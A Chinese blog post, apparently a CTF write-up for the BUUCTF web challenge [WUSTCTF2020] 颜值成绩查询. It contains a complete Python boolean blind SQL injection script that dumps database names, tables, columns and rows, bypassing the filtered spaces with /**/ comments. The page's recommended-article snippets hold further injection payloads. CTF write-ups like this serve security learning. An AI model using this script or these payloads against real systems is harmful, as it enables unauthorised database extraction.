颜值成绩查询

最新推荐文章于 2025-05-13 23:11:20 发布
最新推荐文章于 2025-05-13 23:11:20 发布
阅读量150 收藏
点赞数 2
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51979295/article/details/132996604
版权

颜值成绩查询

目录

题目描述

WUSTCTF2020

时间:2023年8月15日

类型:Web,sql盲注

WP

提取信息

一开始看到下面有回显,以为是联合注入,实际测试后发现不是。并且过滤了等号 空格,所以直接上盲注脚本。

请添加图片描述

# coding = 'uft-8'
# 2023.09.18 by JIYABE

import requests
import time

def avg(num1, num2):  # 平均数函数
    return (num1 + num2) / 2


class InjectionBlind:
    """
    url:url
    current:正确时的回显文字
    space:分隔符,默认为空格
    tab:注释符
    method:提交方法(post/get)
    """

    def __init__(self, url, current, space, tag, method):
        self.url = url
        self.space = space
        self.method = method
        self.i = 0
        self.table_length = 0
        self.data = {
            # "database1": {
            #     "table1": {
            #         "column1": {
            #             "id": [],
            #             "username": []
            #         }
            #     }
            # }
        }
        self.current = current
        self.tag = tag
        if self.method == "get":
            print("提交方法为GET")
            self.method = "requests.get(url=self.url, params=data)"
        else:
            print("提交方法为POST")
            self.method = "requests.post(url=self.url,data=data)"

    def search_char(self, start_num=31, end_num=127, payload=""):
        avg_num = avg(start_num, end_num)
        self.i += 1
        # print(f"\nNo.{self.i}:[{start_num},{end_num}],{avg_num}")
        time.sleep(0.1)

        data = {
            "stunum": f"1{self.space}and{self.space}{payload}>{avg_num}{self.space}{self.tag}"
        }
        res = eval(self.method)
        match = self.current in res.text  # 判断条件
        avg_int = int(avg_num)
        if end_num == start_num:
            return end_num

        if match:
            return self.search_char(start_num=avg_int+1, end_num=end_num, payload=payload)
        else:
            return self.search_char(end_num=avg_int, start_num=start_num, payload=payload)

    def get_database(self, length=20, start_num=31):
        print("开始获取数据库名...\n当前数据库:", end='')
        res = ""
        count = 0
        for i in range(1, length + 1):
            count += self.i
            self.i = 0
            payload = f"ascii(substr(database(),{i},1))"
            c = self.search_char(start_num=start_num, payload=payload)
            if c == start_num:
                print()
                break
            else:
                res += chr(c)
                print(chr(c), end='')
        self.data[res] = {}
        return res

    # def get_tables_count(self, database, start_num=1, end_num=10):
    #     """
    #     寻找当前数据库[self.database]有多少个表
    #     :param start_num: 最少可能有几个表
    #     :param end_num:  最多可能有几个表
    #     :return: 有几个表
    #     """
    #     print(f"获取{database}库中表的个数为:", end='')
    #     payload = f"{self.space}(select count(table_name){self.space}from{self.space}information_schema.TABLES{self.space}where{self.space}TABLE_SCHEMA='{database}')"
    #     res = self.search_char(start_num=start_num, end_num=end_num, payload=payload)
    #     self.table_count = res
    #     print(res)
    #
    #     return res

    def get_tables(self, database="", length=50, start_num=31):
        res = ""
        for i in range(1, length + 1):
            self.i = 0
            payload = f"ascii(substr((select{self.space}group_concat('',table_name){self.space}from{self.space}information_schema.TABLES{self.space}where{self.space}TABLE_SCHEMA='{database}'{self.space}),{i},1))"
            c = self.search_char(start_num=start_num, payload=payload)
            if c == start_num:
                break
            else:
                res += chr(c)
                print(chr(c), end='')
        print()
        return res

    def get_columns(self, database="", table="", length=100, start_num=31):
        res = ""
        print(f"正在获取{database}.{table}表所有列名:", end='')
        for i in range(1, length + 1):

            self.i = 0
            payload = f"ascii(substr((select{self.space}group_concat('',column_name){self.space}from{self.space}information_schema.columns{self.space}where{self.space}TABLE_SCHEMA='{database}'{self.space}and{self.space}table_name{self.space}='{table}'),{i},1))"
            c = self.search_char(start_num=start_num, payload=payload)
            if c == start_num:
                print("\n获取列名完毕")
                break
            else:
                res += chr(c)
                print(chr(c), end='')
        print(res)
        return res

    #
    def get_data(self, target=0, columns="", table="", database="", length=50, start_num=31):
        res = ""
        for i in range(1, length + 1):
            self.i = 0
            payload = f"ascii(substr((select{self.space}concat_ws(',',{columns}){self.space}from{self.space}{database}.{table}{self.space}limit{self.space}{target},1),{i},1))"
            c = self.search_char(start_num=start_num, payload=payload)
            if c == start_num:
                break
            else:
                res += chr(c)
                print(chr(c), end='')
        return res

    def get_datas(self, length=100, columns="", table="", database=""):
        print(f"正在查找{database}.{table}表中所有记录...", end='')
        for i in range(length):
            print(f"\n{i}:", end='')
            res = self.get_data(target=i, columns=columns, table=table, database=database)
            if res == "":
                print("查询结束")
                break
        print()


URL = "http://35aa9255-aa2e-4f69-9c93-adc1ca506b51.node4.buuoj.cn:81/"
a = InjectionBlind(url=URL, current="Hi", tag='#', space='/**/', method="get")
a.get_database()#test
a.get_tables(database="ctf")#
a.get_columns(database="ctf", table="flag")
a.get_datas(database="ctf", table="flag", columns="value")
# print(a.data)

得到flag

flag{487e14bc-5f47-4c28-ac13-914e3b063264}

请添加图片描述

注意

脚本时一定要注意发包不能太快,不然可能会因为访问过快造成误判

J1yabe
关注
buuctf-颜值成绩查询(sql注入)
一直在水些技术小文
05-19 606
输入1-4都是可以的,从5开始就不存在了 多半就是sql注入,但是限制了输入的数据,就只能用报错注入或者盲注了 但尝试后发现,报错注入、布尔盲注和时间盲注都不行,都回显not exists 尝试一下异或注入 输入10正确,1错误,说明是异或注入 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1 这是正确的结果 错误的结果是这样的 通过这个可以最终得到f..
[WUSTCTF2020]颜值成绩查询 -wp
freerats的博客
08-05 656
改变参数stunum发现页面会发生变化。 通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。 写脚本跑一下: import requests url='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php' flag='' for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
[WUSTCTF2020]颜值成绩查询
GAO+的博客
03-07 298
往SQL注入方面考虑,用了BP扫出了时间盲注类型,但是sqlmap没跑出来。空格被过滤以及需要大小写混合,(之后又去尝试了sqlmap,学号不存在的情况,会返回not exists。打开题目,是一个查询框,有两种回显结果。学号存在的情况,会返回Score。BP的注入点,尝试了确实有效。手工尝试了没有收获,看。脚本二分法没有尝试了。URL中带了一个参数。
[WUSTCTF2020]颜值成绩查询 1
ubaichu的博客
07-14 638
[WUSTCTF2020]颜值成绩查询 1 详细解题过程
[WUSTCTF2020]颜值成绩查询1
m0_73673698的博客
09-15 483
发现只有三列,在输入payload:1/**/union/**/select/**/1,2,3--+时发现union和select被过滤了,可以使用大小写来混淆绕过,所以payload应该是 -1/**/uNion/**/sElect/**/1,2,3--+获取flag值payload:-1/**/uNion/**/sElect/**/1,2,group_concat(flag,value)/**/from/**/flag--+先打开页面看到有个输入框,输入个1发现回显。还有其他方法,布尔盲注。
buuctf-[WUSTCTF2020]颜值成绩查询
2202_75317918的博客
10-01 664
当输入的学号不存在时,只会返回“student number not exists.”。猜测是盲注题,因为看不见其他的回显信息,初步想法是构造值为1或0的表达式来进行探测。发现功能就是输入一个学号,然后返回对应的成绩,就是一个简单的查询操作。如果不采用二分法,会跑的很慢。打开环境,随便输个1看看。
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询
weixin_44016181的博客
10-12 345
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询,两道buuctf的练习题。python脚本实现比较简单,模板化python真的不要太爽~~
[WUSTCTF2020]颜值成绩查询(布尔型盲注)
weixin_73399382的博客
07-31 290
输入4之后的数字全是这个报错,几乎确定是盲注了,而且有回显只能是布尔型盲注。这道题一个查询框只能查1-4,扫没有发现其他功能,多半注入题。掏出我82年的脚本来,注入题还是得脚本快。flag在flag表的value里面。
BUUCTF WEB 颜值成绩查询
qq_41696858的博客
03-01 314
一个查询窗口,很直观的感受是SQL注入,本着这个思路,测试0,1,2,3,4,5 发现0和5都是doesn’t exists,这里就可以利用布尔盲注来进行0,1的判断,下面就是过滤字的判断 由于只是布尔判断,所以没有办法判断是单引号闭合还是双引号闭合,or和and也不能判断出来,空格被过滤了是在后面爆表名的时候判断出来的 在尝试1^1的时候发现回显doesn’t exists,那么这个payload就是没问题的,下面就是判断过程了 1^if(length(database())>0,1,0)回显doe
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 857
[WUSTCTF2020]颜值成绩查询(布尔注入)
buu-[WUSTCTF2020]颜值成绩查询
qaq517384的博客
10-08 470
[WUSTCTF2020]颜值成绩查询 报了个session的错,先不管 id输1234都有不同回显且url变为/?stunum=1,5就变成用户不存在了 ?stunum=1^0 ?stunum=1^0 可以用异或盲注 import requests url='http://3a1493b4-eefb-4eed-bb52-c5e5cfc25f91.node4.buuoj.cn:81/?stunum=' flag='' for i in range(1,100): low = 32
[WUSTCTF2020]颜值成绩查询 布尔盲注
qq_37301470的博客
12-02 318
[WUSTCTF2020]颜值成绩查询 只有一个输入框,是sql注入题目 尝试输入1,2,3 可以发现是get方法提交的参数且是数字型 故用hackbar /?stunum=1 or 1=2 %23 student number not exists. 刚刚还可以查到现在查不到了判断存在过滤 尝试下发现是空格 上盲注脚本 import string import requests select=f"select/**/value/**/from/**/flag" ans="" for i in ran
网络安全-等级保护(等保) 2-3 GB/T 22240—2020《信息安全技术 网络安全等级保护定级指南》-2020-04-28发布【现行】
项目管理到售前,一路成长的伙伴!
05-13 739
GB 17859—1999 、GB/T 22239—2019 、GB/T 25069 、GB/T 29246—2017 、GB/T 31167—2014、 GB/T 32919—2016 和GB/T 35295—2017界定的以及下列术语和定义适用于本文件。为了便于使用, 以下重复列出了上述标准中的某些术语和定义。等级保护对象的定级要素包括:a) 受侵害的客体;b) 对客体的侵害程度。定级对象的定级方法按照以下描述进行。对于通信网络设施、云计算平台/系统等起支撑作用的定级对象和数据资源,还需参照。
网络安全顶会——SP 2025 论文清单与摘要
漏洞战争
05-09 727
时间锁谜题是一种密码学原语,它向生成者保证该谜题无法在少于T个顺序计算步骤内被破解。近年来,该技术已在公平合约签署和密封投标拍卖等场景中得到广泛应用。然而,求解者在破解前无法获得关于谜题解的任何先验保证——例如该解在特定应用场景中的"实用性"。本研究提出可验证时间锁谜题(VTLP)来解决这一问题:生成者会发布一个简洁证明,表明该解满足特定属性(同时不泄露其他信息),从而激励求解者投入资源"承诺"破解谜题。我们设计的VTLP支持对谜题解验证任意NP关系R。在技术层面,为避免"直接通过SNARK验证关系Z_RR
常见WEB漏洞----暴力破解
2301_76419201的博客
05-07 662
暴力破解 (Brue Force) 是一种攻击方法 (穷举法),简称为“爆破”,黑客通过反复猜解和实验,旨在以暴力手段登入、访问目标主机获取服务,破坏系统安全,其属于 ATT&CK技术中的一种,常利用猜测、破解、喷洒、撞库四种子技术实现,经常作为其他漏洞攻击的载体。
学习黑客 week1周测 & 复盘
qq_41179365的博客
05-04 2212
(此处请用第一人称完成,你也可以参考以下思路并结合自己的收获与挑战撰写。本周我完成了 Week 1 的“安全基础理论入门”阶段,对信息安全的全局有了清晰的认识。Day 1 学习了 CIA 三要素,能用实例区分机密性、完整性和可用性;Day 2 探究了 OWASP Top 10,亲手制作思维导图加深了漏洞分类;Day 3 通过 ATVR 风险模型和攻击生命周期的对应,首次将抽象风险量化并绘制成脑图;Day 4 理解了中国《网络安全法》及等保 2.0 的核心红线,并制作了“法律速查卡”;
EDR与XDR如何选择适合您的网络安全解决方案
最新发布
hello.reader
05-13 645
随着网络威胁日益复杂,勒索软件、零日攻击和高级持续性威胁(APT)对企业构成重大挑战。**端点检测与响应(EDR)**和**扩展检测与响应(XDR)**是当前网络安全的两大核心工具。本文将深入解析EDR与XDR的功能、原理、差异及适用场景,助您选择最佳解决方案。
SpringBoot框架开发网络安全科普系统开发实现
幽络源
05-10 614
基于SpringBoot的网络安全科普系统开发方案,系统包含知识科普、案例学习、在线测试等功能,适合网络安全教育培训。
颜值简约求职简历模板免费分享
模版的选择要与求职者的专业背景和职位需求相匹配,比如对于高颜值和简约大气的设计风格,可能更适应创意行业和管理层的职位。 ### 结语 综上所述,制作一份优质的简历需要考虑内容的准确性和针对性,版面设计的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值